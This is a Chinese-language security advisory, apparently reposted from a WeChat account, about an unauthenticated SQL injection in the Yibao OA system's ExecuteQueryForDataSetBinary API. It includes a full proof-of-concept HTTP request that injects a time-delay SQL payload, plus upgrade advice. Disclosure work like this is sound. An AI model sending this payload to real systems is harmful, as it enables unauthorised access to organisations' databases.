漏洞预警 | 易宝OA系统SQL注入漏洞

admin

102800
文章

87
评论

2024年4月26日08:21:51评论9 views字数 667阅读2分13秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台，具有信息管理、流程管理、知识管理、协同办公等多种功能。

漏洞预警 | 易宝OA系统SQL注入漏洞

0x03 漏洞详情

漏洞类型：SQL注入

影响：获取敏感信息

简述：易宝OA系统的ExecuteQueryForDataSetBinary接口存在SQL注入漏洞，未授权的攻击者可以通过该漏洞获取数据库信息。

0x04 影响版本

易宝OA

0x05 POC

POST /api/system/ExecuteQueryForDataSetBinary HTTP/1.1Host: {host}Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 43token=zxh&cmdText=;WAITFOR DELAY '0:0:2'--+

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

http://www.topvision.me/

原文始发于微信公众号（浅安安全）：漏洞预警 | 易宝OA系统SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞预警 | 易宝OA系统SQL注入漏洞

暂无

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论